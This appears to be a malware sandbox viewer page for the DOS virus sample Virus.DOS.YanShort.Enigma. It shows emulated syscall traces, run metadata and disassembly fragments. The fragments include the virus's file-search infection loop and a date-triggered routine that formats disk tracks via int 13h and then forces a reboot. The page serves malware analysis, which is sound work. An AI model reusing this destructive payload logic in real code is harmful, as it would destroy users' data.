Sample viewer

vx.netlux.org/Virus.DOS.YanShort.Enigma

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:02:55.445968327Z 47 PC: 12a67 | Get disk transfer address
2018-12-17T23:02:55.447506499Z 26 PC: 13002 | Set disk transfer address
2018-12-17T23:02:55.450030764Z 78 PC: 13012 | Find first file
2018-12-17T23:02:55.456543888Z 26 PC: 13002 | Set disk transfer address
2018-12-17T23:02:55.458038509Z 78 PC: 13012 | Find first file
2018-12-17T23:02:55.465580637Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.468391535Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.471280475Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.474160826Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.478321495Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.481324875Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.484228132Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.488454893Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.492100601Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.49474809Z 42 PC: 12b61 | Get date 0x12b61: pop si
0x12b62: ret
0x12b63: mov si, dx
0x12b65: test byte ptr [si + 0x15], 0x10
0x12b69: jne 0x12b76
0x12b6b: call 0x13016
0x12b6e: jb 0x12b5c
0x12b70: test byte ptr [si + 0x15], 0x10
0x12b74: je 0x12b6b
0x12b76: cmp byte ptr [si + 0x1e], 0x2e
0x12b7a: je 0x12b6b
0x12b7c: call 0x12b98
0x12b7f: push ax
0x12b80: mov ah, 0x1a
0x12b82: int 0x21
0x12b84: pop ax
0x12b85: push si
0x12b86: mov si, 0x77d
0x12b89: sub si, 0x103
0x12b8d: add si, bx
2018-12-17T23:02:55.506980265Z 42 PC: 12aa0 | Get date 0x12aa0: cmp al, 6
0x12aa2: je 0x12aa8
0x12aa4: jne 0x12ab8
0x12aa6: int 0x20
0x12aa8: mov ah, 5
0x12aaa: mov al, 5
0x12aac: mov ch, 0x14
0x12aae: mov cl, 1
0x12ab0: mov dh, 0
0x12ab2: mov dl, 0
0x12ab4: int 0x13
0x12ab6: int 0x19
0x12ab8: mov si, 0xb0b
0x12abb: sub si, 0x103
0x12abf: add si, bx
0x12ac1: mov dx, word ptr [si]
0x12ac3: push ds
0x12ac4: mov ax, word ptr [si + 2]
0x12ac7: mov ds, ax
0x12ac9: push bx
2018-12-17T23:02:55.509180649Z 26 PC: 12acf | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14375,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:24.88625927Z 47 PC: 12a67 | Get disk transfer address
2018-12-25T12:40:24.888520414Z 26 PC: 13002 | Set disk transfer address
2018-12-25T12:40:24.890574219Z 78 PC: 13012 | Find first file
2018-12-25T12:40:24.897874913Z 26 PC: 13002 | Set disk transfer address (See above)
2018-12-25T12:40:24.899542784Z 78 PC: 13012 | Find first file (See above)
2018-12-25T12:40:24.907933395Z 79 PC: 13029 | Find next file
2018-12-25T12:40:24.910966519Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.914242609Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.921181246Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.924349257Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.927626633Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.931449199Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.936022323Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.939238758Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.942833604Z 42 PC: 12b61 | Get date 0x12b61: pop si
0x12b62: ret
0x12b63: mov si, dx
0x12b65: test byte ptr [si + 0x15], 0x10
0x12b69: jne 0x12b76
0x12b6b: call 0x13016
0x12b6e: jb 0x12b5c
0x12b70: test byte ptr [si + 0x15], 0x10
0x12b74: je 0x12b6b
0x12b76: cmp byte ptr [si + 0x1e], 0x2e
0x12b7a: je 0x12b6b
0x12b7c: call 0x12b98
0x12b7f: push ax
0x12b80: mov ah, 0x1a
0x12b82: int 0x21
0x12b84: pop ax
0x12b85: push si
0x12b86: mov si, 0x77d
0x12b89: sub si, 0x103
0x12b8d: add si, bx
2018-12-25T12:40:24.946072191Z 42 PC: 12aa0 | Get date 0x12aa0: cmp al, 6
0x12aa2: je 0x12aa8
0x12aa4: jne 0x12ab8
0x12aa6: int 0x20
0x12aa8: mov ah, 5
0x12aaa: mov al, 5
0x12aac: mov ch, 0x14
0x12aae: mov cl, 1
0x12ab0: mov dh, 0
0x12ab2: mov dl, 0
0x12ab4: int 0x13
0x12ab6: int 0x19
0x12ab8: mov si, 0xb0b
0x12abb: sub si, 0x103
0x12abf: add si, bx
0x12ac1: mov dx, word ptr [si]
0x12ac3: push ds
0x12ac4: mov ax, word ptr [si + 2]
0x12ac7: mov ds, ax
0x12ac9: push bx
2018-12-25T12:40:24.949248353Z 26 PC: 12acf | Set disk transfer address

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14375,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:25.251414122Z 47 PC: 12a67 | Get disk transfer address
2018-12-25T12:40:25.253538894Z 26 PC: 13002 | Set disk transfer address
2018-12-25T12:40:25.255388999Z 78 PC: 13012 | Find first file
2018-12-25T12:40:25.263228707Z 26 PC: 13002 | Set disk transfer address (See above)
2018-12-25T12:40:25.264777418Z 78 PC: 13012 | Find first file (See above)
2018-12-25T12:40:25.272341565Z 79 PC: 13029 | Find next file
2018-12-25T12:40:25.275606618Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.27892137Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.283309066Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.286607009Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.289872436Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.294177368Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.297412231Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.300636004Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.30403515Z 42 PC: 12b61 | Get date 0x12b61: pop si
0x12b62: ret
0x12b63: mov si, dx
0x12b65: test byte ptr [si + 0x15], 0x10
0x12b69: jne 0x12b76
0x12b6b: call 0x13016
0x12b6e: jb 0x12b5c
0x12b70: test byte ptr [si + 0x15], 0x10
0x12b74: je 0x12b6b
0x12b76: cmp byte ptr [si + 0x1e], 0x2e
0x12b7a: je 0x12b6b
0x12b7c: call 0x12b98
0x12b7f: push ax
0x12b80: mov ah, 0x1a
0x12b82: int 0x21
0x12b84: pop ax
0x12b85: push si
0x12b86: mov si, 0x77d
0x12b89: sub si, 0x103
0x12b8d: add si, bx
2018-12-25T12:40:25.307014923Z 42 PC: 12aa0 | Get date 0x12aa0: cmp al, 6
0x12aa2: je 0x12aa8
0x12aa4: jne 0x12ab8
0x12aa6: int 0x20
0x12aa8: mov ah, 5
0x12aaa: mov al, 5
0x12aac: mov ch, 0x14
0x12aae: mov cl, 1
0x12ab0: mov dh, 0
0x12ab2: mov dl, 0
0x12ab4: int 0x13
0x12ab6: int 0x19
0x12ab8: mov si, 0xb0b
0x12abb: sub si, 0x103
0x12abf: add si, bx
0x12ac1: mov dx, word ptr [si]
0x12ac3: push ds
0x12ac4: mov ax, word ptr [si + 2]
0x12ac7: mov ds, ax
0x12ac9: push bx
2018-12-25T12:40:27.359326565Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:40:27.360910822Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:40:27.363954778Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:40:27.367210465Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:40:27.379622629Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:40:27.386105799Z 62 PC: 91fc1 | Close file
2018-12-25T12:40:27.388425335Z 75 PC: 91fe0 | Execute program
2018-12-25T12:40:27.406507447Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:40:27.408789619Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:40:27.419924067Z 48 PC: c609 | Get DOS version
2018-12-25T12:40:27.423911333Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:40:27.430650577Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:40:27.433546888Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:40:27.437841627Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:40:27.445701709Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:40:27.455548147Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:40:27.468128696Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:40:27.470126451Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:40:27.472555746Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:40:27.502493953Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:40:27.507349713Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:40:27.509380163Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:40:27.511426014Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:40:27.513044224Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.514893035Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.516199414Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:40:27.528214853Z 62 PC: 8f8eb | Close file
2018-12-25T12:40:27.53052433Z 62 PC: 8f8f2 | Close file
2018-12-25T12:40:27.532610229Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.534363009Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.536847251Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.538468735Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.540547847Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.543164172Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.544804439Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.546422827Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.549017693Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.550709595Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.552411771Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.554247747Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.557123498Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.558749044Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.560372288Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.562819358Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.564811272Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.566774888Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.570345033Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.572254062Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.574123582Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.576481278Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.578439288Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.59462078Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.597974867Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.599812908Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.601455036Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.605391601Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.607403185Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.60908914Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:40:27.614493628Z 62 PC: 8f90e | Close file
2018-12-25T12:40:27.617300714Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:40:27.619011114Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:40:27.620781583Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:40:27.626236408Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:40:27.6280967Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:40:27.633766533Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:40:27.637342708Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:40:27.638973658Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:40:27.640902689Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:40:27.643164222Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:40:27.644561768Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:40:27.646243614Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:40:27.648000345Z 73 PC: 8fa11 | Release memory
2018-12-25T12:40:27.649506782Z 73 PC: 8efea | Release memory
2018-12-25T12:40:27.65074388Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:40:27.652306297Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:40:27.654122891Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:40:27.655675439Z 73 PC: 8f060 | Release memory
2018-12-25T12:40:27.657039377Z 61 PC: 8f080 | Open file (Filename = 'r,�S�������[�
2018-12-25T12:40:27.667733088Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:40:27.673936161Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:40:27.675924291Z 62 PC: 8f0d1 | Close file
2018-12-25T12:40:27.67939284Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:40:27.703006626Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:40:27.704339081Z 48 PC: 12bee | Get DOS version
2018-12-25T12:40:27.707634282Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:40:27.710432464Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:40:27.712029223Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:40:27.71487186Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:40:27.716617355Z 72 PC: 1355d | Allocate memory
2018-12-25T12:40:27.718479504Z 25 PC: 13596 | Get default drive
2018-12-25T12:40:27.72051554Z 71 PC: 135ad | Get current directory
2018-12-25T12:40:27.72315711Z 59 PC: 135ba | Change current directory
2018-12-25T12:40:27.729191227Z 59 PC: 135c8 | Change current directory
2018-12-25T12:40:27.737499147Z 59 PC: 135d3 | Change current directory
2018-12-25T12:40:27.741652521Z 25 PC: 12d13 | Get default drive
2018-12-25T12:40:27.742901268Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:40:27.744178495Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:40:27.746256235Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:40:27.749032222Z 80 PC: 1301d | Set current PSP
2018-12-25T12:40:27.750072205Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:40:27.751699994Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.752911274Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.754324563Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:40:27.757363376Z 72 PC: 130ec | Allocate memory
2018-12-25T12:40:27.75939159Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:40:27.765971093Z 62 PC: 131ba | Close file
2018-12-25T12:40:27.768919243Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:40:27.769985535Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:40:27.771645641Z 72 PC: 11991 | Allocate memory
2018-12-25T12:40:27.775733774Z 73 PC: 119b2 | Release memory
2018-12-25T12:40:27.777510617Z 72 PC: 119bd | Allocate memory
2018-12-25T12:40:27.779628561Z 73 PC: 119df | Release memory
2018-12-25T12:40:27.78174213Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:40:27.78403113Z 72 PC: 119fd | Allocate memory